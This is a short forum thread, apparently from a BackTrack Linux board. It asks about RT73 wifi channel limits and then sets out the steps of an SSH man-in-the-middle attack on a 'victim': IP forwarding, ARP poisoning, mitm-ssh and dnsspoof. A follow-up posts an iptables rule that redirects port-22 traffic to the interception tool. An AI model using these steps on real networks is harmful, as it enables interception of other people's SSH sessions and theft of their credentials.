RT73 and dnsspoof
First of all, hello and thanks a lot to the Backtrack 4 staff for their awesome work.
I've been playing a lot with Backtrack lately. But if someone helps me with some of questions I have, I'll be thankful.
I have a Conceptronic C54RU wifi usb stick (with a realtek rt73 chipset), and I was doing some wifi cracking when I noticed that I could not sniff data on channels 12, 13 and 14. Why is this? Other security distros let me sniff on those channels without a problem. I believe it has something to do with the drivers, but I really don't know. Also, how may I check the private ioctls of the usb stick? When I run iwpriv it tells me that neither wlan0 or mon0 has private ioctls.
Another question I have is about MITM attacks. I performed SSL and SSH MITM attacks cleanly, but when it comes to SSH it seems that I have to use dnsspoof. Well, it works, but for some unknow reason it does not redirect subdomains. Let's say that I have done the following:
1) Installed MITM-SSH for SSHv2 man in the middle attacks.
2) echoed 1 to /proc/sys/net/ipv4/ip_forward
3) Arp poisoned the victim.
4) Run mitm-ssh redirecting to some ssh server.
5) dnsspoof -i eth0
After doing that, if the victim starts a ssh connection to, for example, backtrack-linux.org, it would go through my machine first and it would be routed to the server that mitm-ssh points to. But if he connects to subdomain.backtrack-linux.org it would not. How do I solve this?
Thank you in advance.
Re: RT73 and dnsspoof
Nevermind about my problems with SSH mitm, I figured out by myself that adding the following rule to iptables does the trick without the need of dnsspoof:
iptables -t nat -A PREROUTING -p tcp --destination-port 22 -j REDIRECT --to-ports 4444 [this is the port running mitm-ssh on localhost]